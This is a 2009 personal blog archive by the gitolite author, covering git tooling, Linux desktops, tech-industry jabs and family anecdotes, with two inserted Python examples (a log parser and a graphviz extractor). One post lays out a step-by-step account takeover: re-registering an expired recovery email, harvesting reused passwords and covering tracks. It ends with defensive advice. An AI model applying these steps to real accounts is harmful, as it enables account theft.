2009-12-30

hilarious... CIP (Ch* in progress)

http://www.fakingnews.com/2009/11/three-letter-word-invented-by-an-indian-mba-creates-stir-in-the-world/

quote (but read the whole thing on the original page, it's great stuff!):

Mumbai. Mr. Murali Chetankar, 29, an MBA from a top tier management institute of India has created a stir around the world. He has invented an all encompassing TLA (Three Letter Acronym or Three Letter Abbreviation), which can be used to describe the work that management graduates do. The acronym – CIP (Ch*tiyaps in Progress) is now universally accepted and understood. Oxford is planning to debate, discuss and include this TLA in its dictionary in the next revision. This is probably the first engineered Indian word to be included in the Oxford Dictionary.

The story of how this was invented is fascinating. Murali was perturbed by the frequent probing of his engineering college classmates as to what work he was doing post his MBA.  Frustrated by the repeated questions like 'Wazzup' and 'Whats happening', Murali decided to take the road less travelled and discover a word to explain what work he did. After much deliberation he realized that all he did for the last 3-4 years was nothing but Ch*tiyaps. In a fit of rage he updated his GMail status to "CIP – Ch*tiyaps in Progress".


2009-12-20

no comment...

http://code.flickr.com/blog/2009/12/02/flipping-out/

A previous blog post of mine was about the above link... well, let's just say it was very frank :-)

After 2 people (including one person on #git I have a lot of respect for) seemed to not like it, I took it down.

However, since this blog is as much a sort of "historical bookmarking device for Sitaram", I need that link in there, so here it is.

You, my gentle reader, can draw your own conclusions.

2009-12-19

some things in life...

- a brand new Yamaha Fazer for your son: Rs 81,000
- driving classes and test for son: Rs 4000
- 2 tickets to New Moon: Rs 300
- taking your pre-teen daughter on a snazzy "young man's" bike to a
crap movie and having her say "dad I owe you bigtime": priceless

:)

2009-12-17

greedy licensing comes home to roost

quote from http://www.gnome.org/~michael/blog/2009-12-14.html

Boggled at Monty.

  • Yes - of course it is a lamers business model to have a restrictive license, coupled with copyright assignment, and dominance by a single company. Yes, of course it leads to strangulation of the community, and perpetuated dominance of a single player.
  • That this realisation appears to only have occurred to Monty now he is trying to make a company fly on the other side of the very wall he himself built, smells pretty suspicious to me.

2009-12-09

was COBOL this bad?

...maybe it never had the opportunity.

But the COBOL of the Internet (tm) seems to be...

http://lwn.net/Articles/364528

Google is forking existing FOSS code bits for Chromium like a rabbit
makes babies: frequently, and usually, without much thought. Rather
than leverage the existing APIs from upstream projects like icu,
libjingle, and sqlite (just to name a few), they simply fork a point
in time of that code and hack their API to shreds for chromium to use.
This is akin to much of the Java methodology, which I can sum up as
'I'd like to use this third-party code, but my application is too
special to use it as is, so I covered it with Bedazzler Jewels and
Neon Underlighting, then bury my blinged out copy in my application.'.
A fair amount of the upstream Chromium devs seem to have Java
backgrounds, which may explain this behavior, but it does not excuse
it. This behavior should be a last resort, not a first instinct.

and http://lwn.net/Articles/365445/ is even nicer...

2009-12-07

malware in Linux?

in a sudden spurt of SNR on /., I found *one* topic with *three* informative comments on this topic...

http://ask.slashdot.org/comments.pl?sid=1461872&cid=30284956
http://ask.slashdot.org/comments.pl?sid=1461872&cid=30280222
http://ask.slashdot.org/comments.pl?sid=1461872&cid=30278934

In addition, this gem landed up somewhere (couldn't find the comment now but it's in there somewhere): "bad analogies are like waxing a monkey with a rainbow"

2009-11-30

breaking the Pareto principle?

quotes from http://howsoftwareisbuilt.com/2009/11/18/interview-with-greg-kroah-hartman-linux-kernel-devmaintainer/

To give an example, for the 2.5 to 2.6 kernel development series, which took about two years, the top 30 people did 80 percent of the work. Now, the top 30 people do 30 percent of the work. The sheer number of developers has also increased. We were running a couple hundred developers, and now we're running a couple thousand.

[...]

We're also increasing the rate of change in our development. The same amount of work one of the top 10 developers did last year wouldn't have even made it into the top 20 this year. Our individual developers have got the work flow down, so we can actually contribute more, to an extent that's amazing.

perspectives, take 2...

http://ask.slashdot.org/comments.pl?sid=1460432&cid=30264494

This was in response to someone asking about network security while backpacking for a whole year through South America!

2009-11-29

stop the internet!

http://forums.theregister.co.uk/forum/1/2009/11/26/lse_crash_again/#c_635437

Subject: "despite a .NET upgrade overseen by Accenture"

Posted Thursday 26th November 2009 13:40 GMT

Hahaha hahahaha hahahahaha hahahaha <gaaaaaaaasp> ha haha hahahaha
hahahahahaha hahaha.

Stop the internet, nothing can ever beat the humour of this statement.

the ubuntu "mono" culture

lovely comment at http://www.linuxtoday.com/news_story.php3?ltsn=2009-11-25-031-35-OS-CY-0019 argues that the slow infiltration of mono-apps in Ubuntu was probably planned that way, and the more such apps get added the easier for non-mono apps to be rejected in favour of a notionally equivalent mono app.

Read the full comment; makes a very cogent point.

2009-11-19

finally, something interesting in Brooke's tale

until now, it was pretty boring. I never really liked her blog --
maybe it was too disjointed? or maybe I like my salacity in larger
doses? I don't know.

but this is cool:
http://www.timemachinego.com/linkmachinego/2009/11/16/me-and-belle-de-jour-could-it-be-brooke/
-- an early warning system that depends on googlewhacking

2009-11-15

(git) finally...!

http://git.kernel.org/?p=gitk/gitk.git;a=commit;h=70a5fc443acbd1fe69cc21c10190375facabaf93

This will fix a long-standing problem for git use at work, and give me
more confidence in saying to people "just stick to the GUIs and you
can't go wrong for most normal operations". I'd sent in the patch in
June but it got lost somewhere that time; this time it got accepted...

2009-11-13

directory level access control via gitolite

I'd like comments on this from my readers.  Don't worry if you don't know what git is.

All you need to know about git/gitolite to understand this post and comment is: (1) git is a modern version control system for source code, (2) git makes using branches (different development lines for the same project; like "release", "maint", "customer-specific", etc) almost trivial, and (3) gitolite is an access control layer that sits underneath it and implements restrictions based on branch name (ie., only the QA guy can push to the "QA-done" branch).

The question was: we need "path-level" restrictions also (I can only change files in subdirectory-A, you can only change files in subdirectory-B, etc).

Here's the email I sent the person who asked me for this feature, and on which I want your comments.

----------

I have a small philosophical objection to this sort of restriction.  Let me explain.

I want the computer to catch mistakes that are easy to make, and hard to reverse.  Pushing the wrong branch is a good example (esp if some branches have similar names), so gitolite is focused on branch permissions.

Touching a file in another directory is a mistake that is hard to make and easy to detect and stop.

Normal workflow is that devs only push to their own branches, from where their code is picked up for QA and (if accepted) moved to the main branch by someone with that authority.  If QA can't even detect that the wrong files have been touched, you have a bigger problem than gitolite can solve :(

Automating subdirectory based restrictions seems as if you are using gitolite as a substitute for internal team communications.  And maybe even trust.

2009-11-12

tutorial: how to watch a movie when you're supposed to be working...

You can do it, it's easy!  Here's how.

(Pre-requisite: a full-day business trip to Mumbai)

Step 1: plan your trip so that all flights (outbound and return) are the "first flight in the morning" kinds.  Mine were a 6am departure outbound and a 6:25am departure on the return.  A 1hr 15 min flight means I'm well in time to be at work by 9am on both days.

An advantage is that delays to first flight in the morning are highly unlikely (except due to fog in Delhi in winter, which is why we chose Mumbai for this tutorial)

(corollary to step 1: this means you have to wake up at 4am or so, but you take those things in your stride)

Step 2: make sure at least one of the flights is Jet Airways.  Bonus points if a Kingfisher flight crashed (no one injured, thankfully) the previous day, blocking half of a usable runway or something, but this is beyond your control.

Step 3: enjoy the movie

Eh what?  I missed a step?  Sure, but those are not *your* steps.  Jet will take care of those.  I stole a flight superintendent's notepad and copied these notes from the back of his book (they were written in invisible ink so I had a bit of trouble, but I'm persistent):

Step 1: most people don't know that the so-called "first flight in the morning to Hyderabad" is not what we in the trade call "AOG" (aircraft on ground).  It comes from Sharjah or Jeddah or Dubai or one of those middle-eastern sounding, why-in-blazes-would-I-ever-want-to-live-there[*] places.  This tricks a lot of people into thinking the flight is safe from delays, especially *in*frequent flyers.

[*] one good reason to live in those places: they don't have any terrorism. Sort of like Indonesia doesn't have any expensive Nike shoe stores maybe?

Step 2: make sure that flight is delayed about 30 minutes.  Also make sure it is parked as far away from the domestic terminal as possible.

Step 3: make sure at no time do you announce a delay more than 10-15 minutes;  20 minutes tops...

Step 4: as soon as some passengers (already irritable from having to wake up at 4am), start arguments about breakfast coupons due to the delay, announce boarding.  Have them go through the final security guard and approach the bus that will take them to the aircraft.

Step 3.9: err, we forgot -- go back to just before step 4 and make sure there is no bus actually waiting.  The passengers cannot re-enter the building and pick a fight with you now; security will stop them.  This is a useful technique to use when passengers get irritable for silly little things like delays and breakfast, and the lack of any update that goes beyond 20 minutes.

Step 5: eventually find a bus and send the PAX to the aircraft.  Finish all the boarding formalities but don't take off for about 1hr 30 minutes.

Step 6: Blame DGCA/ATC for everything.

----

Author's note: some of the fault *was* indeed the DGCA/ATC/Mumbai airport, but Jet could have done a lot to mitigate it.  They did *nothing*.  To add insult to injury, they sent out a 7:40 departure flight on time (while we were cooling our heels inside the aircraft till 9:45).

2009-11-11

(funny) slashdot comment on cloud

(though the original article may not have had anything to do with it, but hey this is /.)

Re:Buzzwords, because thinking is hard
by megamerican (1073936)

"No officer, I'm not naked. I'm a trend setter in cloud clothing. That man over there is wearing pants for me. Honest."

2009-11-08

(git) clearcase speed

from http://permalink.gmane.org/gmane.comp.version-control.git/132311,
in response to someone touting CC's ability to track partial repos and
asking why git can't do that:

> My (limited) experience with ClearCase is that it's so slow that you'd do *anything* to track fewer files in your working copy, so they put a lot of work into exactly that, and no work into performance.

2009-11-06

made my day...

The maintainer of a very popular library in the perl world (LWP.pm) is using gitolite and wrote to me to say thanks and it is working well for him :-)

He probably wrote more perl in a month than I wrote in all my life so this is a "wow" moment for me!

2009-10-29

third strike against Canonical (Ubuntu's parent company)

http://lwn.net/SubscriberLink/359013/c1b70c36dd9fab59/

As before, the fact that it is the extremely balanced Jon Corbet who's saying this that makes it a deal breaker.

2009-10-23

I've never...

been *drunk* and at my desk at work!

Thank you, NC!

2009-10-20

(funny) "teradata" and "cheap" in the same sentence

from http://www.theregister.co.uk/2009/10/19/teradata_blurr/ :

Of course, it was never going to be cheap. People very rarely use the word "cheap" and "Teradata" in the same sentence. It can be done, but you have to say something like: "Blurr is four times less cheap than the comparable rotating disk appliance from Teradata." But then it is an astonishing eight times less slow.

(criminal) another strike against ISB

this can't be good.  First it was the dean B Rammohan Rao who was on the board of directors of Satyam and voted in a manner that even the man on the street knew was unethical.

Now it seems another director/co-founder of ISB, someone called Anil Kumar, is indicted in the insider trading scam that's currently happening in the US.

I'd been tarring most recent MBAs with the same feather, but it seems ISB is a cut above the rest in malfeasance.

[no web link yet; this is from this morning's DC...]

2009-10-19

"no more kaspersky"

well, Eugene Kaspersky turned out to be a proper old moron, which is what you'd expect from someone who makes his living off of Windows' insecurities.

The number of people on http://www.theregister.co.uk/2009/10/16/kaspersky_rebukes_net_anonymity/comments/ saying "well that's it, I'm not going to renew my AV license from this joker" or words to that effect is amazing!

2009-10-15

(malware) finally, a journalist gets it right

I've ranted before about how most journalists reporting on malware refuse to indict or even mention the operating system that is invariably involved: Microsoft Windows.

Finally, Brian Krebs of the Washington Post does it.

Bluntly and coldly.

Not only that, he recommends not using Windows, at least for banking transactions.  Read the article for some really chilling facts.

http://voices.washingtonpost.com/securityfix/2009/10/avoid_windows_malware_bank_on.html

2009-10-14

Joel on pointers

[...] until one day their professor introduces pointers, and suddenly, they don't get it. They just don't understand anything any more. 90% of the class goes off and becomes PoliSci majors, then they tell their friends that there weren't enough good looking members of the appropriate sex in their CompSci classes, that's why they switched.

http://www.joelonsoftware.com/articles/fog0000000073.html (yes it's quite an old story...)

2009-10-05

just in case anyone wants proof...

I mean, I knew it all along, but there are so many sceptics...

http://xkcd.com/224/

2009-10-01

how to get rid of old code in a widely used product

quote from http://lwn.net/Articles/354408/

X is no longer stagnant; it is being heavily developed under freedesktop.org. As X has come back to life, its developers have had to do a massive amount of code cleanup. Keith has figured out a fail-safe method for the removal of cruft from an old code base. The steps, he said, are these:

   1. Publish a protocol specification and promise that there will be long-term support.
   2. Realize failure.
   3. "Accidentally" break things in the code.
   4. Let a few years go by, and note that nobody has complained about the broken features.
   5. Remove the code since it is obviously not being used.

Under this model, the XCMS subsystem was broken for five years without any complaints. The DGA code has recently been seen to have been broken for as long. The technique works, so Keith encouraged the audience to "go forth and introduce bugs."

2009-09-29

there's marketing, there's bad marketing, and then there's Microsoft marketing!

hilarious!

http://www.cnbc.com/id/33007219/

quote: "If Microsoft had been put in charge of marketing sex, the human race would have ended long ago, because no one would be caught dead doing something that uncool."

But it's a short article; read it!

2009-09-26

gitolite is done...

I think gitolite is done now.  It does everything [*] that gitosis does plus a lot more besides.

Here's a brief summary of what's new and improved, as of today.  Most of this is elaborated here, if you want to read more.

What's NEW:

(1) the original reason for gitolite's creation: per-branch permissions.  Being able to say "only Alice and Bob can push the master branch" is great!

(2) rewind permissions: being able to say "only Alice can rewind any branch" is even greater :-)

(3) very useful logging.  Here's an example:

2009-09-19.10:24:37  +  b4e76569659939  4fb16f2a88d8b5  myrepo refs/heads/master       user2   refs/heads/master

The "+" means this is a rewind (this would be "W" for a fast-forward update).  The two SHAs (14 digits are preserved) are the old and the new.  The repo name, the refname being updated, and the user, are next.  The last field is the exact pattern in the config file that matched to allow this update to happen -- great for debugging (rejected attempts don't come to the log file; but enough info shows up on the user's terminal to debug this anyway)

(4) "personal" namespace for refs, per developer; see the link above for details

(5) you can have "excludes" (aka "deny") in the config file if you use the "rebel" branch.  Suddenly opens up a heck of a lot more power for your access control config :-)

(6) ummm this is not something I'd expect gitosis to have but I also have a migration guide for gitosis users plus a simple tool to convert a gitosis config file to gitolite syntax (except gitweb/daemon config).
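As an added example (my own code, not gitolite's), here is a small Python parser for the log line format described in (3), run over the line shown above plus three constructed entries. Beyond just splitting fields, it answers the two questions I'd actually want from such a log: who rewound a protected branch, and which rewinds were let through by a config pattern broader than the ref that was pushed. The field names and helper functions are my assumptions, not gitolite's.

```python
import re
from collections import Counter
from dataclasses import dataclass

# One record per line, laid out as the post describes: timestamp, operation
# ("+" = rewind, "W" = fast-forward), old SHA, new SHA, repo, ref, user, and
# the config pattern that allowed the push.  Field names here are my own.
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<op>[+W])\s+(?P<old>[0-9a-f]+)\s+(?P<new>[0-9a-f]+)\s+"
    r"(?P<repo>\S+)\s+(?P<ref>\S+)\s+(?P<user>\S+)\s+(?P<pattern>\S+)\s*$"
)

# Constructed sample: the line from the post followed by three made-up entries.
SAMPLE_LOG = """\
2009-09-19.10:24:37  +  b4e76569659939  4fb16f2a88d8b5  myrepo refs/heads/master       user2   refs/heads/master
2009-09-19.10:30:02  W  4fb16f2a88d8b5  0a1b2c3d4e5f60  myrepo refs/heads/master       user1   refs/heads/master
2009-09-19.11:02:11  +  1111111111111a  2222222222222b  myrepo refs/heads/topic-x      user3   refs/heads/
2009-09-19.11:05:40  +  3333333333333c  4444444444444d  myrepo refs/heads/master       user2   refs/heads/master
"""


@dataclass
class PushRecord:
    timestamp: str
    rewind: bool      # True for "+", False for "W"
    old_sha: str
    new_sha: str
    repo: str
    ref: str
    user: str
    pattern: str      # the config pattern that matched


def parse_line(line):
    """Parse one gitolite log line; raise on anything that doesn't fit the layout."""
    m = LOG_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised gitolite log line: {line!r}")
    return PushRecord(m["ts"], m["op"] == "+", m["old"], m["new"],
                      m["repo"], m["ref"], m["user"], m["pattern"])


def parse_log(text):
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def rewinds_by_user(records, ref="refs/heads/master"):
    """How many times each user rewound the given (protected) ref."""
    return Counter(r.user for r in records if r.rewind and r.ref == ref)


def broad_pattern_rewinds(records):
    """Rewinds allowed by a pattern that is not the exact ref pushed,
    i.e. places where a wide rule (refs/heads/ or a wildcard) did the work."""
    return [r for r in records if r.rewind and r.pattern != r.ref]


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("rewinds of master:", dict(rewinds_by_user(recs)))
    for r in broad_pattern_rewinds(recs):
        print(f"{r.timestamp} {r.user} rewound {r.ref} via pattern {r.pattern!r}")
```

Feed it the real log (the path is whatever your install writes to) instead of SAMPLE_LOG and the two reports become a cheap daily audit of who is exercising rewind rights and whether a config pattern is wider than intended.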

What's IMPROVED:

(1) "push to admin" is not available by default.  It's a great feature, but it is a support nightmare, and it's a completely unnecessary hill to force a newbie to climb.  However, I do provide clear instructions on how to set it up yourself, and I admit I use it myself.

(2) the config file has a much saner syntax.  Very clean, no clutter.  Also, you can slice and dice your config any way you want and gitolite will combine it all in its head.  See example here or elsewhere in the documentation.  If you're not sufficiently impressed by this, you haven't thought about it enough or your needs are not complex enough :-)

(3) the way to specify gitweb and daemon is much more intuitive and consistent with the rest of the "permissions" syntax.  Just treat them as two special users "gitweb" and "daemon" -- if they have read access to a repo, then so does the corresponding tool :-)

(4) combine #2 and #3, and you get far, far easier ways to set up gitweb/daemon support for many many many repos easily.  Gitosis required you to set up each repo separately in its own paragraph (probably because of the "description" tag)

What's MISSING:

[*] Speaking of the "description" tag, that's the only thing gitosis does which gitolite doesn't.  But you can do it offline if you like, and if you don't use gitweb (I don't) then it may not even matter to you.

2009-09-11

perspectives

Our main departmental server had gone down today around 4:30pm; no idea why.  We checked all the usual things and brought it up, and later in the night I had a false alarm that it was down again.  This is what happened after I realised it was a false alarm and felt a little euphoric.

My daughter was standing next to me, so I gave her a hug and said, emotionally, "it's working, it's working, thank God it's working".

She said "what"?

"My server", I replied.

"That's all you can think of"?...  A brief pause; then: "here I am running out of nail polish remover and you're worried about a server?"

2009-09-06

Fwd: FW: FRIENDSHIP . . . .

What is friendship?

Someone sent me a semi glurge email talking about how you lose friends by not keeping in touch with them. The UNoriginality and chain nature of that email can be gauged by how quickly I could find a dozen links to the text within the email, just so I can tell you what it was without actually forwarding the email itself.

Anyway, it got me thinking...

I count a few friends whom I will do most anything for. And who've probably done more for me than I have ever done or can do. Not Jai-Veeru level friendship, but ordinary human beings level certainly.

So let's pick one of them.

He and I hardly ever talk. Or even email. No farcebook updates (I'm not even sure he has an account, and I certainly don't). No SMSs (I'm not even sure what his cell phone number is). We don't meet often (he lives in Florida, I in India). Or anything.

But not a month goes by without me thinking of him in some context, and I'm sure it's the same for him. He'll email me when he has something to say, and I'll email him when I have something to say. Otherwise... dead silence.

Notice I said *month* :-) I really don't think of him every single day or week. Not that there's anything wrong with that of course :)

I haven't checked my google account, but vague memory, dulled by 3 rounds of Bailey's Irish Cream, tells me it's been at least 6 months since we last communicated. And in the past it has been as much as 1 year or more at times. And we've only met once in the last 7 years or so.

But when we do email again, we're liable to phrase the email as if we're continuing a conversation that was discontinued just a few minutes ago. Or start a new one without *any* preamble ("hey, how you doing... been a long time... how's the family? Good -- yeah my kids are [blah blah]...", and eventually, get to the nub: "say listen I was wondering, you know that [...] you once mentioned? Well I was talking to a friend...")

So is this friendship? You tell me...

Because according to that email, this guy and I are no longer friends :-)

PS: to all my friends, you know who you are: I love you all. And yes, at least part of that is the Baileys talking, but Baileys can only change the words. Not the thought.

2009-09-03

a pol dies an untimely death

I thought I'd always, always, wish ill of any politician.  Any party, but especially this most corrupt and desh-drohi bunch of crooks, led by that Italian woman, selling India down the river in every way imaginable.

Perhaps I'm not as cynical as I thought I was...  because it still feels sad.  All said and done, he has a wife, kids, grandkids...  It's not how many people need you, it's how many people want you that counts I guess, and he will probably be missed by those.

[for my one non-Indian reader: the CM of my state (eqvt to a governor in the US) died in a copter crash yesterday in a remote area]

2009-08-26

gitolite -- managing multiple git repositories

[this article rated G (Geeks only), GG in some geographies (Git Geeks only)]

Well, after more than a year of using and championing gitosis, I finally got off my duff and created "gitolite".

It is certainly inspired by gitosis's basic ideas, but it lets you specify per-branch permissions -- which is a really big thing and something I am often asked about at work.  It's written entirely in perl (of course), and designed to be installed and used, without needing root access, on any Unix machine that managed to install git and perl.  And I think my config file format is much simpler than gitosis's, but maybe I'm prejudiced :-)

The README (nicely formatted, thanks to github) is at that same URL; just go down the page a little.

2009-08-10

what distro do I favour...

[offby1 asked me this in a comment to a previous blog post.  I replied briefly, then realised I had a lot more to say on the subject.]

I've been a Mandrake user since late 99 or early 2000 or so.  I had a brief flirtation with Ubuntu in between, but it didn't work out.

I'm a confirmed KDE fan -- I never liked Gnome philosophically, even before Mono dependencies like F-Spot and Beagle started becoming standard.  I hate the look and feel, I hate the minimalism, and I really, *really*, hated that if I mounted my home directory temporarily on a colleague's Gnome box using the GUI (sftp://sitaram@my.ip.address), Gnome would remember the credentials for a long time afterward, while KDE would obligingly forget about them immediately.  [Tested again today; Gnome now has a nice button that says "forget password immediately".  Whoo hoo!  But does it forget?  No!  After 2 minutes it still remembered it -- it had kept the VFS session open in the background and just reconnected when the URL was typed in again.  I didn't wait around to see when it expires; I just killed the processes that seemed to have the connection open and changed my password just in case!  Bloody awful security if you ask me...]

Ok where was I... KDE, right...

But recently, having to install MDV 2009.1 on my dad's old clunker made me realise the charms of one of the alternative desktop+WMs.  Specifically, LXDE+openbox -- it's really fast compared to KDE.  And when I tried it on my Core 2 Duo + 2GB desktop, I was surprised to find that it makes a difference even on that, so that's what I use now.

Of course, there are many pieces of KDE I need, and like.  For example, the hardware volume buttons on a laptop only respond when "kmix" is running, so I run kmix.  I still like "konsole" more than "lxterminal".  Then there's Okular, dolphin, gwenview (a KDE program whose name starts with a "G" -- go figure!), krusader, all of which I like very much.  I just no longer run kwin (the window manager) that's all.

In fact, it actually doesn't matter even if I *install* all of KDE -- hard disk space is not the problem.  They just don't get loaded into RAM, that's all.

Downside: I lose all the fancy transparency stuff.  That was cute, and even useful sometimes (like typing something into the bottom window while reading off the top window which was at 75% transparency -- very impressive!) but I can live without it.

...and people wonder why git is so fast

over the past few days, there has been a huge amount of activity on the git mailing list, mostly from Linus himself, over the speed of the SHA-1 routines within git.

Being the "God" he is, one hesitates to call him names like "obsessive compulsive". Thankfully, it looks like he's enough of a human to do that himself :-)

-------- Original Message --------

via Linus' blog by Linus on 8/9/09
I've actually written code lately, although for some reason it's been all these stupid projects. First I needed to fix the kernel tty refcounting, then I got all OCD on the git SHA1 routines.

I don't quite know why I wasted that much time on something as trivial as SHA1 hashing, but it was kind of fun in a "let's use the compiler as a glorified assembler" kind of way. Some people seem to think that C is a real programming language, but they are sadly mistaken. It really is about writing almost-portable assembly language, and it turns out that getting good results from SHA1 really is mostly about trying to fight the compiler's tendency to try to be clever.

So here is the current result of me trying to get gcc (well, arguably of it is mostly the C pre-processor, rather than the compiler proper ) to generate good assembly code. On my Nehalem machine (but not Netburst or Atom - poor fragile micro-architectures that they are), it actually seems to outperform the OpenSSL hand-written assembly language implementation.

And once I get rid of libcrypt from openssl, I get rid of two silly runtime loadable libraries that git no longer needs. And that in turn speeds up the test-suite by a couple of seconds.

Did I mention that I seem to have some OCD issues?

2009-08-08

yet another reason to not recommend Ubuntu

http://lwn.net/SubscriberLink/345945/f2292e2a33d95465/

The first para is quite hard hitting.  And this is from Jon Corbet, the LWN editor, who's much more likely to understate things than otherwise, so that sorta doubles the effect.

how to meet a friend you haven't seen for a while

...get your car stuck somewhere close to his home and call him :-)

Thanks, R!

2009-08-04

the Whitman defense

"I contradict myself? Very well then I contradict myself. I am large, I contain multitudes."

...awesome!

(from http://arstechnica.com/microsoft/news/2009/08/microsoft-word-1983---2009-rest-in-peace.ars)

2009-08-03

how twitter got hacked...

http://www.techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/

no technical hacking here; very, very simple stuff; please read (especially K)

Step 1:

When you register a new gmail account you give them a "secondary" email.  If you forget your password you can ask gmail to send a "password reset" link to this secondary email.

In this case, the hacker found that

  - his victim had a "hotmail" address as a secondary
  - he had not used that address for years
  - so hotmail had expired/deleted it (I don't blame them on this; even if it is MS!)
  - so anyone was free to register that address again
  - so the hacker simply registered it himself
  - thus getting the "password reset" email for his victim's gmail account :-)

Step 2:

The second part is even simpler.  He needed to reset the password back to what the owner **currently** uses, otherwise the owner would get suspicious (if he was unable to log in next time).  And he needed to do this very quickly.

  - he looked through all the saved email on the hacked gmail account
  - found a few passwords helpfully sent back by various services to which the victim had subscribed
  - gambled that the victim uses the same password for everything
  - and reset the gmail password to that

Step 3:

Once he was sure everything was OK, he just used that same password to access the victim's **official** twitter email.

Conclusion:

Who needs cryptography, buffer overflows, complicated shellcode, rootkits, and all that techie stuff when users can be this naive :-)  I mean there's not a byte of code or a mangled URL or a malicious Javascript or even a single HEX character in this whole thing!!!

Moral of the story:

  - never use the same password for more than one service.
  - delete registration emails from websites if they contain your password.  Be sure to empty trash (or "delete forever") too
  - in any case, change your passwords once in a while

"your toddler may be violating a patent"

found on a slashdot sig somewhere, with a link to:

http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO1&Sect2=HITOFF&d=PALL&p=1&u=/netahtml/PTO/srchnum.htm&r=1&f=G&l=50&s1=6,368,227.PN.&OS=PN/6,368,227&RS=PN/6,368,227

amazing...  absolutely amazing.

so now I have to *thank* those fscking yellow plates?

http://physicscentral.com/buzz/blog/index.cfm?postid=3414795237807494042

It seems that traffic jams are least probable when about 40% of the drivers are breaking a few rules.  No word on what happens if that 40% is more like 60%, *and* they break *every* rule though.

PS: for my one and only non-Indian reader: taxis (and other "for hire" vehicles) in India carry yellow license plates (normal ones are white).  And said taxis are far and away the **WORST** drivers in any sense of the word.

2009-07-29

the madness of corporate disclaimers on emails

So I was researching some security product, and I came upon this:

http://www.xml-dev.com/pipermail/fde/2007-May/000305.html

This is amazing.  Most corporate emails are infested with this crap anyway, but I've never seen one this bad.

I count 18 words of "actual message", 29 words of the guy's signature, including all sorts of details that should never be seen on a public site, and -- get this -- 167 words of "legal disclaimer".

Amazing...

2009-07-23

plain text to PDF via Markdown and Beamer...

...and a little perl in between

My problem is that office software sucks, and presentation software sucks even more.  Too much mousing around needed (and it doesn't matter whether it is OpenOffice or MS Office; I hate them both equally)

All these years, my presentations have consisted of plain text on plain white backgrounds, with hardly any pictures.  I start sweating if I have to make a picture or a chart.  My preferred editor for everything and anything under the sun is vim.  Even my firefox browser is controlled by something called vimperator that lets me use vi keystrokes.

Anyway to cut a long story short, having to make one more presentation sort of broke me.  I'd tried various solutions in the past, but none of them seemed to work, so I finally bit the bullet, learned enough about LaTeX and Beamer to be able to generate input for Beamer, and ended up with a pretty decent PDF generator that takes HTML.  The HTML comes from plain text via Markdown, which is a wiki-like language that I really like.

[If you've never seen a wiki language, it's basically a simplified markup, like using **bold** and *italic* instead of <strong>bold</strong> and <em>italic</em>, and so on -- the resulting document looks and feels pretty much like plain text when you're editing it, but when you pass it through the Wiki engine (in this case, Markdown), it gets converted to nice HTML].

So, I type in plain text using Markdown's minimalist syntax, Markdown converts it to HTML, I write a little perl program that converts the HTML to LaTeX, and then pass that to Beamer, which produces a really snazzy PDF, with nice colors, slide navigation, etc etc.

Done.

Well not quite.  I was using something similar for images (a package called graphviz).  Graphviz takes text like this:

        digraph {
            node[fontsize=24]
            a -> b -> c -> d
            b -> p -> q -> x
            p -> y
        }

and produces a neat little picture that I can't really show you in a blog post that doesn't seem to like images (well I pasted it at http://imagebin.ca/view/IWKbKYdH.html but that might not last forever).

Anyway now I got really greedy.  Since a lot of the "pictures" I had to make could be done using graphviz, and I was starting to use it more and more, I wanted to have it all in one file.  Text, images, the whole thing in one easy to edit text file :-)

So I did that next.  Made up a nice easy syntax that tells my HTML->LaTeX processor this is inline graphviz code, so it picks it out, runs graphviz on it, and puts the file in /tmp where Beamer picks it up.
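As an added example (my own Python, not the author's perl), here is that extraction step: find each inline graphviz block in the text, swap it for an image reference, and render the source with dot into the output directory. The fence marker (~~~dot ... ~~~) is an assumed syntax, since the post doesn't show its own, and the sample document is constructed around the digraph from the post.

```python
import hashlib
import pathlib
import re
import shutil
import subprocess

# Added example, not the author's perl: pull inline graphviz out of a Markdown
# source, render it with dot, and leave an image reference behind. The block
# marker (a tilde fence tagged "dot") is an assumed syntax; the post does not
# show the author's own.
BLOCK_RE = re.compile(r"^~~~dot[ \t]*\n(.*?)^~~~[ \t]*\n", re.S | re.M)


def extract_graphs(text, outdir="/tmp"):
    """Replace each inline graphviz block with a Markdown image reference and
    return (rewritten text, [(image path, dot source), ...]). The file name is
    a hash of the source, so an unchanged graph maps to the same file."""
    graphs = []

    def repl(m):
        src = m.group(1)
        digest = hashlib.sha256(src.encode()).hexdigest()[:12]
        path = str(pathlib.PurePosixPath(outdir) / ("graph-%s.png" % digest))
        graphs.append((path, src))
        return "![graph](%s)\n" % path

    return BLOCK_RE.sub(repl, text), graphs


def render(graphs, fmt="png"):
    """Run dot once per graph that is not already rendered. The source goes in
    on stdin and the output path is a plain argument: no shell, so nothing in
    the document can turn into a command."""
    dot = shutil.which("dot")
    if dot is None:
        raise RuntimeError("graphviz 'dot' not found on PATH")
    for path, src in graphs:
        if pathlib.Path(path).exists():
            continue
        subprocess.run([dot, "-T" + fmt, "-o", path], input=src.encode(),
                       check=True)


# Constructed sample document, built around the digraph shown in the post.
SAMPLE_MD = """# Slide one

Some text, then the graph from the post:

~~~dot
digraph {
    node[fontsize=24]
    a -> b -> c -> d
    b -> p -> q -> x
    p -> y
}
~~~

More text.
"""

if __name__ == "__main__":
    rewritten, graphs = extract_graphs(SAMPLE_MD)
    print(rewritten)
    print("graphs to render:", [p for p, _ in graphs])
    render(graphs)  # needs dot on PATH
```

The image name is a hash of the dot source, so re-running over an unchanged document doesn't re-render, and dot gets the source on stdin with the output path as an argument rather than through a shell, which matters the moment someone else's document goes through the pipeline.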

[Along the way something amusing happened.  I'd hardly ever used LaTeX before, so everything was new, and at one point I went on to #latex to ask a question.  The helpful folks there (one of them was also a #git guru by the way) bombarded me with information such as TikZ, which contained far too much LaTeX for my taste.  I don't really like LaTeX syntax, though in its own way it's very beautiful and you can write it nicely and all.  [eh?  what's that?  Yes my favourite language is still perl.  Why do you ask?]

I did not have the heart to tell them that I would never directly code LaTeX to save a dying grandmother -- they were so nice and helpful it would seem like trolling.  But I bookmarked the URLs offered anyway, in case I ever change my mind.]

So that's my adventures in PDF making.  If you want to see sample input and output to get a feel for it, email me.

2009-07-21

the world as we know it is ending...

via LWN.net by corbet on 7/20/09

